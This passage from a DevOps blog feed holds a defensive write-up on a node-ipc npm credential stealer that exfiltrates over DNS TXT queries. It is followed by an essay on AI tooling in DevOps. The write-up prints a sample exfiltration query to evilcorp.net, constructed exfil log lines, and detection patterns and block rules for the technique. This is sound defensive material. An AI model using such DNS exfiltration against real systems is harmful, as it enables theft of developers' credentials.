          Detection: spotting exfil in your DNS logs
        </a>
        </h2><p>If you have DNS query logging enabled on your CI runners or developer laptops, this is what to look for.</p>
<p><strong>Long, high-entropy labels.</strong> A legitimate query is <code>registry.npmjs.org</code>. An exfil query is <code>mfqxezlj4qcaij2gmiyc4t3oojxw4y3vnu3wcljom5wsa2ltnbxxmzlroruxg4dpobxw4u3jonxw2zlu.c07.victim42.evilcorp.net</code>. The first label is base32 binary, very long, and uniformly distributed across the alphabet. That is the signal.</p>
<p>A starter detection on AWS Route 53 Resolver query logs in Athena:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">SELECT</span>
  query_timestamp,
  srcaddr,
  query_name,
  query_type,
  length(query_name) <span class="hljs-keyword">AS</span> qlen
<span class="hljs-keyword">FROM</span> route53_resolver_query_logs
<span class="hljs-keyword">WHERE</span> query_type <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;TXT&#x27;</span>
  <span class="hljs-keyword">AND</span> query_timestamp <span class="hljs-operator">&gt;=</span> <span class="hljs-built_in">current_date</span> <span class="hljs-operator">-</span> <span class="hljs-type">interval</span> <span class="hljs-string">&#x27;1&#x27;</span> <span class="hljs-keyword">day</span>
  <span class="hljs-keyword">AND</span> length(query_name) <span class="hljs-operator">&gt;</span> <span class="hljs-number">80</span>
  <span class="hljs-keyword">AND</span> regexp_like(split_part(query_name, <span class="hljs-string">&#x27;.&#x27;</span>, <span class="hljs-number">1</span>), <span class="hljs-string">&#x27;^[a-z2-7]{50,}$&#x27;</span>)
<span class="hljs-keyword">ORDER</span> <span class="hljs-keyword">BY</span> query_timestamp <span class="hljs-keyword">DESC</span>;
</code></pre><p>That regex matches a 50-plus-character base32 label, which is the signature of chunked binary in the first label. A normal <code>dig +short A ...</code> query never produces a label that long.</p>
<p>On the runner itself, the same idea with <code>tcpdump</code>:</p>
<pre><code class="hljs language-bash"><span class="hljs-built_in">sudo</span> tcpdump -i any -nn -s 0 -A <span class="hljs-string">&#x27;udp port 53&#x27;</span> 2&gt;/dev/null \
  | grep -oE <span class="hljs-string">&#x27;[a-z2-7]{50,}\.[^ ]+&#x27;</span> \
  | <span class="hljs-built_in">sort</span> -u
</code></pre><p>Leave that running for a baseline build and see what shows up. If anything other than the occasional long ARN-like label appears, dig deeper.</p>
<p><strong>Volume of TXT queries.</strong> Most builds make a handful of A/AAAA queries and effectively zero TXT queries. A build that produces hundreds of TXT queries to the same parent domain is the loud version of the same signal.</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">SELECT</span>
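  <span class="hljs-comment">-- query_name is logged with a trailing dot, so allow one before the end anchor</span>
  regexp_extract(query_name, <span class="hljs-string">&#x27;\.([^.]+\.[^.]+)\.?$&#x27;</span>, <span class="hljs-number">1</span>) <span class="hljs-keyword">AS</span> parent_domain,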
  <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>) <span class="hljs-keyword">AS</span> txt_queries
<span class="hljs-keyword">FROM</span> route53_resolver_query_logs
<span class="hljs-keyword">WHERE</span> query_type <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;TXT&#x27;</span>
  <span class="hljs-keyword">AND</span> query_timestamp <span class="hljs-operator">&gt;=</span> <span class="hljs-built_in">current_timestamp</span> <span class="hljs-operator">-</span> <span class="hljs-type">interval</span> <span class="hljs-string">&#x27;1&#x27;</span> <span class="hljs-keyword">hour</span>
<span class="hljs-keyword">GROUP</span> <span class="hljs-keyword">BY</span> <span class="hljs-number">1</span>
<span class="hljs-keyword">HAVING</span> <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>) <span class="hljs-operator">&gt;</span> <span class="hljs-number">50</span>
<span class="hljs-keyword">ORDER</span> <span class="hljs-keyword">BY</span> <span class="hljs-number">2</span> <span class="hljs-keyword">DESC</span>;
</code></pre><p>50 TXT queries per hour to a single parent domain is well above baseline for normal traffic. Tune the threshold once you have a week of baseline data.</p>
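<p>The two signals above (base32-shaped first labels and TXT volume per parent domain) combined into one offline scanner, as an added example that is not part of the original post. It goes one step past the queries by scoring label entropy. The field names follow the Route 53 Resolver columns used in the SQL; the <code>3.5</code> bits-per-character floor, the <code>attacker.example</code> domain and every log line are constructed assumptions.</p>

```python
import base64
import hashlib
import json
import math
import re
from collections import Counter, defaultdict

# Same label shape as the SQL above: a first label of 50+ base32 characters.
BASE32_LABEL = re.compile(r"^[a-z2-7]{50,}$")


def shannon_entropy(text):
    """Bits per character; base32 of ciphertext sits close to log2(32) = 5."""
    total = len(text)
    return -sum(n / total * math.log2(n / total) for n in Counter(text).values())


def normalise(name):
    # Resolver logs carry a trailing dot, and DNS names are case-insensitive.
    return name.rstrip(".").lower()


def parent_domain(name):
    # Last two labels, like the SQL. Naive: no public-suffix handling (co.uk etc.).
    return ".".join(name.split(".")[-2:])


def scan(log_lines, min_entropy=3.5, txt_threshold=50):
    """Scan one hour of JSON query-log lines.

    Returns (label_hits, noisy_parents): TXT queries whose first label looks
    like chunked base32, and parent domains that received more than
    txt_threshold TXT queries in the slice. min_entropy is an assumed starting
    value; tune it against your own baseline.
    """
    label_hits = []
    txt_per_parent = defaultdict(int)
    for line in log_lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines instead of aborting
        if not isinstance(rec, dict) or rec.get("query_type") != "TXT":
            continue
        name = normalise(str(rec.get("query_name", "")))
        if not name:
            continue
        parent = parent_domain(name)
        txt_per_parent[parent] += 1
        first = name.split(".")[0]
        if BASE32_LABEL.match(first) and shannon_entropy(first) >= min_entropy:
            label_hits.append({
                "srcaddr": rec.get("srcaddr"),
                "query_name": name,
                "parent": parent,
                "entropy": round(shannon_entropy(first), 2),
            })
    noisy = {p: n for p, n in txt_per_parent.items() if n > txt_threshold}
    return label_hits, noisy


def build_sample():
    """Constructed log lines, not captured traffic."""
    lines = []
    for i in range(60):
        # 32 hashed bytes -> 52 base32 characters, inside the 63-character label cap.
        digest = hashlib.sha256(f"constructed-chunk-{i}".encode()).digest()
        chunk = base64.b32encode(digest).decode().rstrip("=").lower()
        lines.append(json.dumps({
            "query_timestamp": "2026-05-14T10:00:00Z",
            "srcaddr": "10.0.0.5",
            "query_name": f"{chunk}.c{i:02d}.victim42.attacker.example.",
            "query_type": "TXT",
        }))
    benign = [
        ("registry.npmjs.org.", "A"),                # ordinary install traffic
        ("_dmarc.example.com.", "TXT"),              # legitimate TXT lookup
        ("a" * 60 + ".cdn.example.net.", "TXT"),     # long label, but zero entropy
    ]
    for name, qtype in benign:
        lines.append(json.dumps({
            "query_timestamp": "2026-05-14T10:00:01Z",
            "srcaddr": "10.0.0.9",
            "query_name": name,
            "query_type": qtype,
        }))
    lines.append("not json")  # damaged line; the scanner must survive it
    return lines


if __name__ == "__main__":
    hits, noisy = scan(build_sample())
    print(f"{len(hits)} base32-shaped TXT queries")
    for parent, count in noisy.items():
        print(f"{parent}: {count} TXT queries in the slice")
```

<p>The regex alone would also flag the constructed <code>aaaa...</code> label; the entropy floor is what drops it, and it drops any other long but repetitive label the same way.</p>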
<h2 id="h2-prevention-a-small-dns-allowlist-for-ci" class="group relative scroll-mt-24">
        <a href="#h2-prevention-a-small-dns-allowlist-for-ci" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prevention: a small DNS allowlist for CI
        </a>
        </h2><p>The strongest control is to give your CI runners a resolver that only answers for domains you want to resolve. Everything else gets NXDOMAIN, and the exfil dies at the resolver.</p>
<p>A minimal CoreDNS config that allowlists npm, GitHub, your container registry, and your cloud provider:</p>
<pre><code class="hljs language-text"># /etc/coredns/Corefile
. {
    template ANY ANY . {
        rcode NXDOMAIN
    }
}

registry.npmjs.org github.com codeload.github.com objects.githubusercontent.com {
    forward . 1.1.1.1 8.8.8.8
    cache 30
    log
}

.ecr.us-east-1.amazonaws.com .s3.us-east-1.amazonaws.com .sts.amazonaws.com {
    forward . 169.254.169.253
    cache 30
    log
}
</code></pre><p>Point your CI runner&#39;s <code>/etc/resolv.conf</code> at this CoreDNS instance instead of the cloud-provided one. Now an <code>npm install</code> of a clean package works. An <code>npm install</code> that pulls a bad node-ipc still runs the install hook, but every TXT query the payload issues comes back NXDOMAIN, and your CoreDNS log has the full record of which domain the payload tried to reach.</p>
<p>Two caveats:</p>
<ol>
<li><strong>The allowlist is real work.</strong> You have to enumerate every domain your builds legitimately query. Expect surprises: the AWS SDK queries STS endpoints by region, GitHub Actions queries a different set of CDN domains depending on what&#39;s being downloaded, Docker queries authentication endpoints by image registry. Spend a day in audit-only mode (log everything, NXDOMAIN nothing) before you flip the switch.</li>
<li><strong>DoH inside the runtime breaks this.</strong> If your application or a build tool resolves DNS through DoH directly to <code>1.1.1.1</code>, your CoreDNS allowlist never sees the query. Block outbound TCP/443 to known public DoH endpoints (<code>1.1.1.1</code>, <code>8.8.8.8</code>, <code>9.9.9.9</code>, <code>1.0.0.1</code>) from runners as a backstop.</li>
</ol>
<p>For developer laptops the equivalent is your endpoint protection or DNS-filtering provider (Cloudflare Gateway, NextDNS, Pi-hole on your home network). The Cloudflare Gateway policy is one line:</p>
<pre><code class="hljs language-text">Action: Block
DNS query type matches: TXT
DNS domain matches regex: ^[a-z2-7]{50,}\.
</code></pre><p>That blocks the exact label shape this payload generates without breaking any legitimate query.</p>
<h2 id="h2-if-you-ran-a-bad-version" class="group relative scroll-mt-24">
        <a href="#h2-if-you-ran-a-bad-version" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          If you ran a bad version
        </a>
        </h2><p>The rotation order matters because some tokens can sign other tokens. Do this top-to-bottom on the affected machine and on anything that machine logged into in the last week.</p>
<ol>
<li><strong>GitHub tokens.</strong> <code>gh auth logout</code>, then go to <a href="https://github.com/settings/tokens">https://github.com/settings/tokens</a> and revoke every PAT. Reissue with the minimum scope you actually need. Revoking GH tokens first prevents the attacker from pushing malicious commits to your repos using stolen credentials.</li>
<li><strong>Cloud STS sessions.</strong> Force-expire all active sessions: AWS <code>aws sts get-caller-identity</code> to find the role, then revoke session via console or <code>aws iam put-user-policy</code> denying everything. GCP <code>gcloud auth revoke --all</code>. Azure <code>az logout &amp;&amp; az account clear</code>.</li>
<li><strong>Long-lived cloud keys.</strong> Rotate AWS access keys, GCP service-account JSON keys, Azure SP credentials. Yes, even if you &quot;only had the keys for testing&quot;.</li>
<li><strong>SSH keys.</strong> Reissue keypairs. Remove the public key of the compromised machine from every <code>authorized_keys</code> it landed on, including GitHub, GitLab, your jump host, and any cloud VM you SSH&#39;d into.</li>
<li><strong>Kubeconfig.</strong> Rotate the cluster CA-signed certs for the user. For EKS / GKE / AKS this is &quot;remove the IAM principal from <code>aws-auth</code> and re-add&quot;, &quot;remove the GCP IAM binding and re-add&quot;, &quot;remove the Azure RBAC role assignment and re-add&quot; respectively.</li>
<li><strong>App secrets.</strong> Anything in <code>.env</code> that the payload read: API keys, database passwords, Stripe keys, Sentry DSNs, observability tokens. Rotate the lot.</li>
<li><strong>AI tool keys.</strong> Anthropic, OpenAI, Mistral, Cursor, Continue.dev. These were explicit targets in this payload.</li>
</ol>
<p>While you&#39;re rotating, also run a <code>git log --since=&quot;2026-05-14&quot; --author=&lt;your-email&gt;</code> on every repo you have push access to. The attacker&#39;s first move with a stolen GH token is usually a commit to a repo you maintain, either as a worm-propagation step or as the next pivot. If anything in that log looks unfamiliar, force-push the previous good HEAD and rotate the token before the new one runs the worm again.</p>
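<p>To establish whether a project resolved one of the three versions named in this post, including as a transitive dependency several levels down, the lockfile can be checked directly. This is an added example, not code from the original post or from npm; it covers <code>package-lock.json</code> only, and the sample lockfiles, the package names <code>cli-a</code>, <code>framework-b</code> and <code>ipc-alias</code>, and the clean version shown are constructed.</p>

```python
import json

# The three versions this post names as malicious.
BAD_VERSIONS = {"node-ipc": {"9.1.6", "9.2.3", "12.0.1"}}


def _resolve(name, version):
    """Undo an npm alias: lockfile v1 records it as 'npm:REAL-NAME@VERSION'."""
    if isinstance(version, str) and version.startswith("npm:"):
        real, _, ver = version[4:].rpartition("@")
        return real, ver
    return name, version


def find_bad(lock, bad=BAD_VERSIONS):
    """Return sorted (location, name, version) for every bad install in a parsed lockfile."""
    hits = set()

    def check(location, name, version):
        name, version = _resolve(name, version)
        if version in bad.get(name, ()):
            hits.add((location, name, version))

    if "packages" in lock:
        # lockfileVersion 2 and 3: flat map keyed by install path.
        for path, meta in lock["packages"].items():
            if not path:
                continue  # "" is the root project itself
            folder = path.rsplit("node_modules/", 1)[-1]
            # An aliased install keeps the real package name in "name".
            check(path, meta.get("name", folder), meta.get("version"))
    else:
        # lockfileVersion 1: nested "dependencies" tree.
        def walk(deps, trail):
            for name, meta in deps.items():
                here = trail + [name]
                check(" > ".join(here), name, meta.get("version"))
                walk(meta.get("dependencies", {}), here)

        walk(lock.get("dependencies", {}), [])
    return sorted(hits)


def scan_lockfile(path):
    """Load a package-lock.json from disk and report bad installs."""
    with open(path, encoding="utf-8") as fh:
        return find_bad(json.load(fh))


# Constructed lockfiles for illustration.
SAMPLE_V3 = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "constructed-app"},
        "node_modules/cli-a": {"version": "1.0.0"},
        "node_modules/cli-a/node_modules/framework-b": {"version": "2.0.0"},
        "node_modules/cli-a/node_modules/framework-b/node_modules/node-ipc": {"version": "9.2.3"},
        "node_modules/node-ipc": {"version": "9.2.1"},
        "node_modules/ipc-alias": {"name": "node-ipc", "version": "12.0.1"},
    },
}

SAMPLE_V1 = {
    "lockfileVersion": 1,
    "dependencies": {
        "cli-a": {
            "version": "1.0.0",
            "dependencies": {"node-ipc": {"version": "9.1.6"}},
        },
        "ipc-alias": {"version": "npm:node-ipc@12.0.1"},
        "node-ipc": {"version": "9.2.1"},
    },
}

if __name__ == "__main__":
    for label, lock in (("v3", SAMPLE_V3), ("v1", SAMPLE_V1)):
        for location, name, version in find_bad(lock):
            print(f"[{label}] {name}@{version} at {location}")
```

<p>A clean lockfile today does not clear a machine that installed during the window, so check the lockfile as it stood in commits and CI runs from May 14 onward as well.</p>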
<h2 id="h2-why-this-matters-beyond-node-ipc" class="group relative scroll-mt-24">
        <a href="#h2-why-this-matters-beyond-node-ipc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why this matters beyond node-ipc
        </a>
        </h2><p>The node-ipc payload is the third major npm credential stealer this month. TanStack on May 11, AntV / <code>echarts-for-react</code> on May 19, node-ipc on May 14, plus the broader Shai-Hulud campaign behind a chunk of these. All three of those campaigns used HTTP POST to attacker domains for exfil. node-ipc is the first one I have seen in the wild use DNS at scale, and the technique works because the average DevOps egress story stops at HTTPS.</p>
<p>If you only take one thing from this post, it&#39;s that <strong>DNS is a control plane your firewall does not look at</strong>. Treat it like one. Log it, allowlist it on the high-value machines (CI runners, anything with cloud admin creds, build servers), and put the same kind of alert on weird DNS patterns that you already have on weird HTTPS patterns. Most teams have spent the last six months adding lockfile pinning and provenance verification. That&#39;s necessary. It is not sufficient. The attackers have already moved one layer down.</p>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        </h2><p>The May 14 node-ipc compromise is small in absolute numbers (three versions, 822K weekly downloads), but big in what it demonstrates. A credential stealer that exfils via DNS TXT queries bypasses the HTTPS egress controls almost every team relies on. The defense is a resolver-layer allowlist, query logging with alerting on high-entropy labels, and treating DNS as part of your egress posture instead of an invisible service that just works.</p>
<p>If you ran any of <code>node-ipc@9.1.6</code>, <code>node-ipc@9.2.3</code>, or <code>node-ipc@12.0.1</code> between May 14 and now, treat the machine as compromised and walk the rotation list above. Then add a DNS allowlist to your CI runners before the next wave teaches everyone the same lesson the hard way.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[AI Is Reshaping DevOps. The Engineers Are Faster Than the Vendors.]]></title>
      <link>https://devops-daily.com/posts/ai-reshaping-devops-engineers-vs-vendors</link>
      <description><![CDATA[GitHub, Datadog, HashiCorp and friends are moving carefully. The engineers running their stacks are wiring AI into kubectl and pull-request review on a Tuesday afternoon. Here is what is actually changing in 2026, what is not, and where the gap between vendors and the engineers using their tools is widest.]]></description>
      <pubDate>Wed, 20 May 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/ai-reshaping-devops-engineers-vs-vendors</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[DevOps]]></category><category><![CDATA[AI]]></category><category><![CDATA[AIOps]]></category><category><![CDATA[Automation]]></category><category><![CDATA[Developer Tools]]></category>
      <content:encoded><![CDATA[<p>A question gets asked in every DevOps Slack channel right now: how will AI change our work? The honest answer is that no one knows the final shape yet. What we can say with confidence is who is moving faster. It is not the dominant vendors. GitHub, HashiCorp, Datadog, and Red Hat are being careful, because they have customers to keep and revenue to defend, and a wrong AI bet would cost them years. Meanwhile, individual engineers are wiring Claude Code into their kubectl wrappers, training small models on their own incident postmortems, and shipping internal pull-request review agents to teams of five. The Reddit thread that prompted this post is a fair sample of the energy: working engineers trying things, sharing what works, and being honest about what does not.</p>
<p>This post is a working snapshot of where AI is actually changing DevOps in May 2026. What you can use today, what the incumbents are doing, what the engineers running real stacks are doing that the incumbents are not, and which corners are still pure hype.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        </h2><ul>
<li>Code authoring is the area where AI is most useful and least controversial. Pull-request review, test generation, and dependency upgrade chores are the next layer in.</li>
<li>Observability and incident response are getting natural-language query interfaces faster than the vendors expected. Honeycomb&#39;s MCP server, Datadog&#39;s Bits AI, New Relic&#39;s Grok all work. The deeper bet (autonomous root-cause analysis) is still flaky.</li>
<li>Infrastructure-as-code is the slowest-moving area. Terraform&#39;s plan/apply loop punishes hallucinations harder than any other surface in the stack.</li>
<li>Big incumbents move slowly because they own the workflow. A bad AI feature ships to thousands of paying teams and the support tickets compound. Individual engineers move fast because they only have to please themselves.</li>
<li>The single highest-leverage thing for a DevOps engineer to try this week: an MCP server that exposes your own infrastructure (kubectl, terraform state, observability) to your AI assistant of choice. The local connection beats every SaaS AIOps tool we have tried.</li>
</ul>
<h2 id="h2-what-has-actually-changed-for-devops-engineers" class="group relative scroll-mt-24">
        <a href="#h2-what-has-actually-changed-for-devops-engineers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What has actually changed for DevOps engineers
        </a>
        </h2><p>Five concrete shifts you can see in the work right now. None of them are speculative.</p>
<h3 id="h3-1-code-authoring-is-solved-enough-that-nobody-talks-about-it" class="group relative scroll-mt-24">
        <a href="#h3-1-code-authoring-is-solved-enough-that-nobody-talks-about-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          1. Code authoring is solved enough that nobody talks about it
        </a>
        </h3><p>Two years ago, GitHub Copilot was the headline. Today nobody at a DevOps conference mentions it because everyone has it. The question is no longer &quot;will AI write code for me&quot; but &quot;which AI, in which IDE, with what context window.&quot; Claude Code, Cursor, Windsurf, Zed, JetBrains AI Assistant, Aider, Continue all do credible work on Terraform modules, Helm charts, GitHub Actions workflows, and Bash scripts. The differentiator is now the editor experience and the size of the context window, not whether the suggestions are good.</p>
<p>The interesting failure mode: AI is fine at writing the next function. It is bad at writing the next module if &quot;next module&quot; requires holding the system architecture in working memory. A senior engineer&#39;s job has not moved much; the boilerplate has moved a lot.</p>
<h3 id="h3-2-pull-request-review-is-the-next-surface-and-it-is-messy" class="group relative scroll-mt-24">
        <a href="#h3-2-pull-request-review-is-the-next-surface-and-it-is-messy" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          2. Pull-request review is the next surface, and it is messy
        </a>
        </h3><p>Three patterns are competing:</p>
<ul>
<li><strong>Vendor agents.</strong> GitHub Copilot Code Review, GitLab Duo, CodeRabbit. These plug into the PR, leave comments, sometimes suggest patches. Quality varies. The honest take is that they catch a lot of style nits and miss most architectural issues, which is the inverse of what you want.</li>
<li><strong>Self-hosted agents.</strong> A 200-line script that calls Claude with the diff and a project-specific prompt, posted as a check via the GitHub API. Several engineers we know are running these against their own repos. Hit rate is higher than vendor tools because the prompt is tuned to the codebase. Maintenance overhead is real.</li>
<li><strong>PR-triggered agentic workflows.</strong> Devin, OpenHands, Claude Code in headless mode. Pick up a PR, run the tests, push a fix commit if a failure looks recoverable. Works for small classes of bug (linting, type errors). Falls over on anything that requires judgement.</li>
</ul>
<p>Nobody has the answer yet. The space is moving fast enough that what we wrote three months ago is already stale. If you are picking one to evaluate this quarter, the self-hosted script gives you the cleanest mental model of what AI is actually doing on your codebase.</p>
<h3 id="h3-3-observability-is-getting-a-natural-language-interface-fast" class="group relative scroll-mt-24">
        <a href="#h3-3-observability-is-getting-a-natural-language-interface-fast" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          3. Observability is getting a natural-language interface, fast
        </a>
        </h3><p>Datadog Bits AI, New Relic Grok, Honeycomb&#39;s MCP server, Grafana&#39;s natural-language query feature in Loki, Splunk SPL2 with AI assists. The pattern is the same: type a question in English, get a query in the vendor&#39;s DSL plus the result. It works because the search surface is well-defined and bounded. A bad PromQL query returns no rows; a bad Terraform plan can destroy production.</p>
<p>The harder bet from the same vendors is &quot;AI-driven root cause analysis.&quot; The marketing claims are aggressive. The reality, when we have run the products on real incidents, is that they are good at correlating signals and bad at picking the load-bearing one. Useful as a second opinion. Not yet a replacement for an experienced engineer reading the same dashboards.</p>
<h3 id="h3-4-dependency-management-is-being-eaten-by-agents" class="group relative scroll-mt-24">
        <a href="#h3-4-dependency-management-is-being-eaten-by-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          4. Dependency management is being eaten by agents
        </a>
        </h3><p>Dependabot was the start. The current wave is more ambitious: an agent that runs the upgrade, reads the changelog, updates the calling code, runs the tests, and opens the PR with a summary of what changed. RenovateBot has supported this shape for a while; what is new is that the LLM step in the middle is now reliable enough to ship.</p>
<p>Individual engineers are running this on Tuesday afternoons against their own monorepos. The vendors are catching up. GitHub Copilot now has a &quot;fix the failing PR&quot; mode that does roughly this; Mend, Snyk, and JFrog have variants.</p>
<p>What still does not work well: major-version upgrades that change semantics. The LLM does not know whether <code>removed deprecated foo()</code> means &quot;delete the call&quot; or &quot;migrate to bar().&quot; Senior judgement still wins here.</p>
<h3 id="h3-5-incident-response-is-the-loudest-but-the-slowest" class="group relative scroll-mt-24">
        <a href="#h3-5-incident-response-is-the-loudest-but-the-slowest" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          5. Incident response is the loudest, but the slowest
        </a>
        </h3><p>The pitches: an AI agent that auto-pages, summarises the incident, drafts the postmortem, suggests the fix, runs the rollback. Several vendors sell this story. Cortex, PagerDuty, Rootly, FireHydrant, Incident.io all have an AI feature.</p>
<p>What actually ships well today is the boring part: the summary. Take 30 minutes of Slack messages and produce a five-bullet recap that the incident commander can paste into the postmortem template. Good models do this reliably. Vendors do it. Any engineer with a Claude API key does it for free.</p>
<p>What does not ship well is the action. An AI suggesting &quot;roll back deployment X&quot; is fine. An AI executing the rollback against production needs a level of confidence we do not have yet, and the engineering teams we trust are not letting AI write to prod systems without a human in the loop. That layer of the pitch is still aspirational.</p>
<h2 id="h2-what-has-not-changed" class="group relative scroll-mt-24">
        <a href="#h2-what-has-not-changed" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What has not changed
        </a>
        </h2><p>Infrastructure-as-code is the surface where AI has had the least real impact. The reasons are honest:</p>
<ul>
<li>A Terraform plan is unforgiving. A hallucinated resource is a 500-line diff at apply time. Even if the engineer catches it, the trust cost is real.</li>
<li>State is hard to read. The LLM does not know what is in your remote state file unless you give it. Many tools cannot give it because the state has secrets in it.</li>
<li>Module conventions are project-specific. The &quot;right&quot; way to write a Terraform module varies by org, and the LLM cannot infer it from the public docs.</li>
</ul>
<p>There are early attempts (Pulumi Copilot, HashiCorp&#39;s Terraform AI features, atmos with AI assists) but none of them have produced the &quot;wow&quot; moment that pair-programming with Claude Code has for application code. The terraform plan loop punishes mistakes harder than any other tool in the DevOps stack, which is exactly why the LLMs struggle there.</p>
<p>Secrets management, kernel-level tooling (eBPF, kprobes), and database schema migrations are in the same bucket. AI assists at the margins; the load-bearing decisions are still human.</p>
<h2 id="h2-why-the-big-vendors-are-moving-slowly" class="group relative scroll-mt-24">
        <a href="#h2-why-the-big-vendors-are-moving-slowly" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why the big vendors are moving slowly
        </a>
        </h2><p>This is the question the snippet that inspired this post got right. GitHub does not ship a half-broken AI feature because their userbase is too large to absorb the support burden of a regression. Datadog does not auto-route alerts via an LLM because a single false negative in a production incident becomes a customer-leaving event. HashiCorp does not auto-write Terraform plans because the plan is the last line of defense between an engineer and an outage.</p>
<p>The economics are asymmetric. A vendor that ships a great AI feature gets a press cycle. A vendor that ships a bad one loses three of its biggest customers. So they ship slowly, in betas, with opt-in flags, behind feature toggles.</p>
<p>This is rational for them. It also leaves a gap that the engineers running real stacks are filling.</p>
<h2 id="h2-what-engineers-are-doing-that-vendors-are-not" class="group relative scroll-mt-24">
        <a href="#h2-what-engineers-are-doing-that-vendors-are-not" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What engineers are doing that vendors are not
        </a>
        </h2><p>The shape that matters: engineers build narrow, opinionated tools for their specific stack. A vendor ships something general for everyone. The narrow one is more useful to the team that built it. Examples we have seen in the last six months:</p>
<ul>
<li><strong>A kubectl wrapper that pipes commands and output to Claude with a prompt about the cluster&#39;s deployment conventions.</strong> Replaces the &quot;ask the senior engineer what to do&quot; Slack message for routine debugging.</li>
<li><strong>A pre-commit hook that runs the diff through a local model and refuses to commit if it spots a likely secret leak.</strong> The local model is small; the false-positive rate is high but acceptable when the alternative is committing an AWS key.</li>
<li><strong>A Slack bot that watches incident channels, drafts a postmortem skeleton when the channel goes quiet for 30 minutes, and pings the IC to review.</strong> Saves two hours of writing per incident.</li>
<li><strong>A custom MCP server that exposes Prometheus, the cluster&#39;s events API, and the deployment history to Claude Code.</strong> The engineer asks &quot;why is this pod restarting?&quot; and the model runs the queries it needs. This is what Datadog and New Relic are trying to sell, but built on top of the open standards in 45 minutes.</li>
<li><strong>A nightly job that runs a model against the last day&#39;s CI failures and groups them by likely cause.</strong> Replaces the &quot;is this a known flake?&quot; triage question.</li>
</ul>
<p>None of these are products. All of them are 200-line scripts an engineer wrote in an afternoon. Cumulatively, they are doing more for the day-to-day of a DevOps team than any vendor announcement we have seen this year.</p>
<h2 id="h2-where-to-start-this-week" class="group relative scroll-mt-24">
        <a href="#h2-where-to-start-this-week" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where to start this week
        </a>
        </h2><p>If you have not built anything AI-shaped into your workflow yet, pick one of these. They are ordered by impact-to-effort ratio.</p>
<ol>
<li><strong>Run Claude Code (or Cursor, or Aider) against your infrastructure repos.</strong> Not for new code; for reading. Ask it to summarise a Terraform module you did not write. Ask it to map the data flow through your Helm chart. The &quot;explain this codebase to me&quot; use case is the most underrated AI application in DevOps.</li>
<li><strong>Wire one MCP server.</strong> The Anthropic Model Context Protocol now has servers for kubectl, GitHub, Prometheus, Loki, Postgres, and most of the tools you already use. Connecting Claude to your own infra (read-only) takes 20 minutes and immediately makes the rest of this list 10x more useful.</li>
<li><strong>Pick one chore and write a script.</strong> Dependency triage, PR summarisation, incident notes, on-call schedule rotation explainers. Whatever takes 30 minutes of your week and is mostly the same each time. A 200-line wrapper around an LLM API will replace it for a one-time cost.</li>
<li><strong>Set up a self-hosted PR review agent.</strong> Not a vendor product. A script. Tune the prompt to your codebase&#39;s conventions. Run it as a GitHub Actions check. Iterate weekly.</li>
</ol>
<h2 id="h2-where-not-to-start-this-week" class="group relative scroll-mt-24">
        <a href="#h2-where-not-to-start-this-week" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where not to start this week
        </a>
        </h2><p>Equally important. These are the corners where the hype is well ahead of the substance, and you will burn time you do not get back.</p>
<ul>
<li><strong>&quot;AI ops platforms&quot; that promise auto-remediation against production.</strong> The good ones do not actually do this; the marketing implies they do. Read the docs carefully.</li>
<li><strong>LLMs in the critical path of a deployment pipeline.</strong> A flaky model becomes a flaky deploy. Use AI to suggest, not to gate.</li>
<li><strong>Custom training on your incident data, hoping for &quot;predictive AIOps.&quot;</strong> The dataset is too small. The signal is too noisy. Three years from now this might work; today it does not.</li>
<li><strong>Replacing a senior engineer with an agent.</strong> No vendor sells this in those words, but several pitches imply it. The senior engineer&#39;s judgement on what to do with the LLM&#39;s output is the load-bearing piece.</li>
</ul>
<h2 id="h2-what-the-next-year-probably-looks-like" class="group relative scroll-mt-24">
        <a href="#h2-what-the-next-year-probably-looks-like" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the next year probably looks like
        </a>
        </h2><p>A short list of predictions, marked clearly as predictions:</p>
<ul>
<li>The PR review surface will get a clear winner. Either GitHub Copilot Code Review levels up enough to be the default, or one of the agent startups (Greptile, CodiumAI, Sweep, others) wins on quality.</li>
<li>MCP becomes standard. The protocol is the right shape, the vendors are adopting it, and the network effect compounds with every new server.</li>
